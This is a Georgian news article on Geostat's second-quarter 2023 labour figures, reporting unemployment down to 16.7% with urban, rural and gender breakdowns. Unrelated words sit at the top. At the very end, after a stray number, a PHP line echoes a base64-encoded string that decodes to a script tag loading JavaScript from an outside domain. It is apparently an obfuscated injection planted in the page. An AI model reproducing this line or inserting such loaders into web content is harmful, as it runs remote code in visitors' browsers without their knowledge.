celsiusi
ავერსი შნაიდერი

2023 წლის II კვარტალში საქართველოში უმუშევრობის დონე წინა წლის შესაბამის პერიოდთან შედარებით 1.4 პროცენტული პუნქტით შემცირდა და 16.7 პროცენტი შეადგინა. მონაცემები საქსტატმა გამოაქვეყნა.

კერძოდ, საქსტატის ცნობით, 2023 წლის II კვარტალში წინა წლის შესაბამის პერიოდთან შედარებით დაქირავებულთა რიცხოვნობა გაიზარდა 48.7 ათასი კაცით (5.6%) და 916.7 ათასს მიაღწია, ხოლო თვითდასაქმებულთა რიცხოვნობა 9.0 ათასით გაიზარდა (2.2%) და 410.2 ათასი შეადგინა. ამავე პერიოდში უმუშევართა რაოდენობა შემცირდა 14.6 ათასით (5.2%) და 266.9 ათასი შეადგინა.

2023 წლის II კვარტალში სამუშაო ძალის მონაწილეობის დონე (სამუშაო ძალის წილი 15 წლის და უფროსი ასაკის მოსახლეობაში) წინა წლის შესაბამის პერიოდთან შედარებით 1.6 პროცენტული პუნქტით გაიზარდა და 53.2 პროცენტით განისაზღვრა, ხოლო დასაქმების დონე 2.1 პროცენტული პუნქტით გაიზარდა და 44.3 პროცენტი შეადგინა. სამუშაო ძალის მონაწილეობის დონე ქალაქის ტიპის დასახლებებში გაზრდილია 1.0 პროცენტული პუნქტით, სოფლის ტიპის დასახლებებში კი - 2.4 პროცენტული პუნქტით, ხოლო დასაქმების დონე ქალაქის ტიპის დასახლებებში 2.1 პროცენტული პუნქტითაა გაზრდილი, სოფლის ტიპის დასახლებებში კი - 2.0 პროცენტული პუნქტით და შესაბამისად 44.9 პროცენტს და 43.4 პროცენტს შეადგენს

ამასთან, საქსტატის მონაცემებით, 2023 წლის II კვარტალში, წინა წლის შესაბამის პერიოდთან შედარებით, უმუშევრობის დონე შემცირებულია საქალაქო ტიპის დასახლებებში 2.5 პროცენტული პუნქტით, ხოლო სოფლის ტიპის დასახლებებში გაზრდილია 0.2 პროცენტული პუნქტით.

გარდა ამისა, უმუშევრობის დონე ტრადიციულად მაღალია კაცებში, ქალებთან შედარებით. 2023 წლის II კვარტალში, წინა წლის შესაბამის პერიოდთან შედარებით, აღნიშნული მაჩვენებელი ქალებში შემცირებულია 0.5 პროცენტული პუნქტით, ხოლო კაცებში - 2.0 პროცენტული პუნქტით და შესაბამისად 14.5 პროცენტს და 18.5 პროცენტს შეადგენს. ხოლო სამუშაო ძალის მონაწილეობის დონე ქალებთან შედარებით მაღალია კაცებში. 2023 წლის II კვარტალში აღნიშნული მაჩვენებელი ქალებში 42.9 პროცენტს, ხოლო კაცებში 65.1 პროცენტს შეადგენდა. წინა წლის შესაბამის პერიოდთან შედარებით სამუშაო ძალის მონაწილეობის დონე ქალებში გაზრდილია 2.2 პროცენტული პუნქტით, ხოლო კაცებში - 0.9 პროცენტული პუნქტით.

322
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");